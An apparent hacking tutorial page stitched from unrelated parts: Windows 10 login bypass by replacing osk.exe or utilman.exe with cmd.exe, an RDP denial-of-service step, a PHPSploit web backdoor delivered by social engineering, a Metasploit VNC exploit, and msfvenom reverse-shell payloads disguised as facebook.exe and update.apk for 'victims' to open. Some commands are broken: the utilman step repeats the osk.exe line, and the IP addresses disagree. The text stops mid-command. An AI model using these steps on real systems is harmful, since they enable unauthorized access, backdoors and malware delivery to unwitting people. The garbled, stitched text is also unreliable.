2 ways to Hack Windows 10 Password Easy Way

In this article, you will learn the multiple ways to recover/reset/crack the password when you don't have access to the machine or you forgot the login password of window 10.

Security is importanat for everyone, so people use passwords to protect their data or machine. But many times users forgot their password and try multiple combinations of alphabets and numbers to remember the password and to log in the PC. Don’t waste time, get the easy way to crack the window10 password.

Table Of Content

·         Prerequisites to crack window10 password

·         Create a bootable USB of window 10

·         Crack window10 password via replacing cmd .exe with Ease of Access App (on Screen Keyboard .exe)

·         Crack Window10 Password via replacing cmd .exe with Ease of Access App (Utilman .exe)

·         Crack window10 password via WinGreek Ultimate tool

Prerequisites to crack window 10 password

Either you should have already bootable USB having window10 image or you can first boot the drive before the password crack activity.

You should have an ISO image of window 10 or can download from https://www.microsoft.com/en-in/software-download/windows10 that contains all setup files. Secondly, you should have a CD/DVD or USB drive with at least 8 GB (for the 64-bit operating system). And make it bootable from an ISO image of window 10.

Create Bootable USB of window10

There are multiple ways to boot the USB drive but the method we mostly used either by RUFUS or by Universal USB-Installer. Below are the steps as follows:

1.       Download the latest version of RUFUS from https://rufus.ie/

2.       Click on select and browse the ISO image of window10.

3.       Select partition Scheme either MBR or GPT and File system FAT32 or NTFS as per compatibility.

4.       Click on start and makes the USB bootable.

Crack Window10 Password via replacing cmd.exe with Ease of Access App (osk .exe)

In window10, the Ease of Access button is on the bottom right corner of the login screen. Through the boot media, you can replace the Ease of Access applications with cmd.exe to open an elevated command prompt without logging in. There is much Ease of access app you can select as per your choice. But here we will show by using two utilities(on-screen keyboard and utility icon).

Ease of Access Utilities

                                                                                

Name	.exe filename
On-screen keyboard	osk.exe
Magnifier	magnify.exe
Narrator	narrator.exe
Sticky Key	sethc.exe
DisplaySwitch	displayswitch.exe
Utility	utilman.exe
app switcher	Atbroker.exe

Let’s start the easy way to crack the window10 password.

Start your computer and enter into Bios Setup (computers of different brands have their boot menu and BIOS key ). You can choose boot preferences (CD/DVD or USB ) devices that you want to boot from.

Click next

In the lower-left corner of windows setup, click on "Repair your computer".

Now, choose to troubleshoot as an option, to see the advanced options

Click on Advanced options

Now click on command prompt

Command prompt will elevate, and then you’ll copy the command prompt executable (cmd.exe) over top of the On-Screen keyboard executable. (Must know the path of system32 drive)

copy d:\windows\system32\cmd.exe d:\windows\system32\osk.exe

Type yes for overwrite option.

Now Reboot the PC. 

After reboot, PC will start and once you will reach on the login page, in the right bottom corner of the login screen click on Ease of Application (middle one), after that once you will click on On-Screen Keyboard immediately CMD prompt as an administrator mode will elevate

Now you can reset the password, either by changing the existing user password or by adding a new user (permissions should be as an administrator)

Syntax: net user account name *

Example: net user raj * and press enter.

Set any password for that account.

Crack Window10 Password via replacing cmd .exe with Ease of Access App (Utilman .exe)

Follow the above steps mentioned in the first procedure until the command prompt elevation not opened to replace the cmd.exe with Utilman.exe (Ease of App utility). 

Then copy the command prompt executable (cmd.exe) over top of utility manager executable. (Must know the path of system32 drive)

copy d:\windows\system32\cmd.exe d:\windows\system32\osk.exe

Type yes for overwrite option.

Now Reboot the PC. 

After reboot, PC will start and once you will reach on the login page, in the right bottom corner of the login screen click on Ease of Application (middle one) icon, once you will click on it immediately CMD prompt as an administrator mode will open.

Now you can reset the password, either by changing the existing user password or by adding a new user (permissions should be as an administrator)

Syntax: net user account name *

Example: net user raj * and press enter.

Set any password for that account.

Crack window10 password via WinGeeker Tool

This method is the most user-friendly approach to hacking a Windows 10 password. It’s highly effective and doesn’t require any expertise to use. The simple three-step process will ensure that any Windows user or admin account is immediately accessible. The most reliable aspect of this utility, called TunesBro WinGeeker, is that it does not touch your data in any way.

 Download TunesBro WinGeeker to a different PC then use the built-in ISO burning utility to burn the ISO file and create a boot disk or boot drive. This is your password reset disk.

 When the disk or drive is ready, remove it and insert it into the locked PC. You will now need to go into the BIOS menu and change the boot priority so the system boots from your password reset disk instead of the Windows installation files that are on your hard drive.

 Once you see the TunesBro WinGeeker interface, you need to select the right Windows version and the user account that is locked. Click on ‘Reset Password’ to hack and blank the Windows 10 password. Now click on ‘Reboot’ and the job is done.

Denial of Service Attack on Network PC using SET Toolkit

First open your kali Linux application tab in Exploitation Tools and then chose SET Toolkit

Now press enter

Now choose option 2, “Fast-Track Penetration Testing” and enter

Then choose option 2, “Custom Exploits” and Enter

After that choose option 4, “RDP use after free –Denial of Service” and Enter

Now Enter the IP address of remote pc you want to be crash

Hack Remote PC with PHP File using PHPSploit Stealth Post-Exploitation Framework

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

Features

Efficient: More than 20 plugins to automate post-exploitation tasks

·         Run commands and browse filesystem, bypassing PHP security restrictions

·         Upload/Download files between client and target

·         Edit remote files through local text editor

·         Run SQL console on target system

·         Spawn reverse TCP shells

Stealth: The framework is made by paranoids, for paranoids

·         Nearly invisible by log analysis and NIDS signature detection

·         Safe-mode and common PHP security restrictions bypass

·         Communications are hidden in HTTP Headers

·         Loaded payloads are obfuscated to bypass NIDS

·         http/https/socks4/socks5 Proxy support

Convenient: A robust interface with many crucial features

·         Cross-platform on both the client and the server.

·         Powerful interface with completion and multi-command support

·         Session saving/loading feature, with persistent history

·         Multi-request support for large payloads (such as uploads)

·         Provides a powerful, highly configurable settings engine

·         Each setting, such as user-agent has a polymorphic mode

·         Customisable environment variables for plugin interaction

·         Provides a complete plugin development API

Open your kali Linux terminal and type the following command

https://github.com/nil0x42/phpsploit.git

open terminal and type ./phpsploit

Now you’ll get a prompt, type set target 192.168.1.3 and press enter

Now type exploit

It’ll create the backdoor with the message Current backdoor is:

See the example below:

Now open leafpad/notepad and paste the above code and save it in .php extension

Now send this backdoor file to the victim using any social engineering technique. In my case I’m using Xampp and paste it in htdocs folder and wait for the victim to click on the .php file.

Now you can view the backdoor image

Now type set target http://192.168.1.3/script/script.php (location of file in victim’s PC). Now you can connect with the target PC.

Now type whoami command, it will show you the user details and type pwd command to check the location of your backdoor file in target PC.

Now type run ipconfig command to check IP configuration of victim’s PC.

Now type run systeminfo command to check system information of victim’s PC.

(Now you get complete access of victim’s PC and can run any command)

Hack Remote Windows PC using VNC Keyboard Remote Code Execution

This module exploits VNC servers by sending virtual keyboard keys and executing a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager payload is typed and executed. On Unix/Linux systems a xterm terminal is opened and a payload is typed and executed.

Exploit Targets

VNC Viewer

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/vnc/vnc_keyboard_exec

msf exploit (vnc_keyboard_exec)>set lhost 192.168.1.4 (IP of Local Host)

msf exploit (vnc_keyboard_exec)>set rhost 192.168.1.3 (IP of Remote Host)

msf exploit (vnc_keyboard_exec)>exploit

Hack Remote Windows, Linux PC and Android Phone using Msfvenom

msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework 

The advantages of msfvenom are:

·         One single tool

·         Standardized command line options

·         Increased speed

Options available in msfvenom

Hack with Meterpreter Payload

Open your kali linux terminal and type

Msfvenom –p windows/meterpreter/reverse_tcp lhost=92.168.1.33 lport=445 –f exe > /root/Desktop/facebook.exe

-p for payload	Windows/meterpreter/reverse_tcp
Lhost (IP address of kali linux)	192.168.1.33
Lport (port of your local pc)	445
F (File Format)	Facebook.exe

Now we successfully generate the malicious exe File, it will stored on your local computer

/root/Desktop/facebook.exe

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.33

set lport 445

exploit

Now send your facebook.exe files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Hack with Simple Shell Payload

Open your kali linux terminal and type

Msfvenom –p windows/shell/reverse_tcp lhost=92.168.1.33 lport=445 –f exe > /root/Desktop/raj.exe

Now we successfully generate the malicious exe File, it will stored on your local computer

/root/Desktop/raj.exe

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/shell/reverse_tcp

set lhost 192.168.1.33

set lport 445

exploit

Now send your raj.exe files to victim, as soon as they download and open it. Now you can directly access the victim shell

Hack with powershell Payload

Open your kali linux terminal and type

Msfvenom –p cmd/windows/reverse_powershell lhost=92.168.1.33 lport=445  > /root/Desktop/file.bat

Now we successfully generate the malicious bat File, it will stored on your local computer

/root/Desktop/file.bat

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload cmd/windows/reverse_powershell

set lhost 192.168.1.33

set lport 445

exploit

Now send your file.bat files to victim, as soon as they download and open it. Now you can get the access of victim pc.

Hack Android Phone

Open your kali linux terminal and type

Msfvenom –p android/meterpreter/reverse_tcp lhost=92.168.1.33 lport=445 > /root/Desktop/update.apk

Now we successfully generate the malicious apk File, it will stored on your local computer

/root/Desktop/update.apk

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.1.33

set lport 445

exploit

Now send your update.apk files to victim mobile, as soon as they download and open it. Now you can get the access of victim android mobile.

Hack Linux PC

Open your kali linux terminal and type

Msfvenom –p python/meterpreter/reverse_tcp lhost=92.168.1.33 lport=445 > /root/Desktop/update.py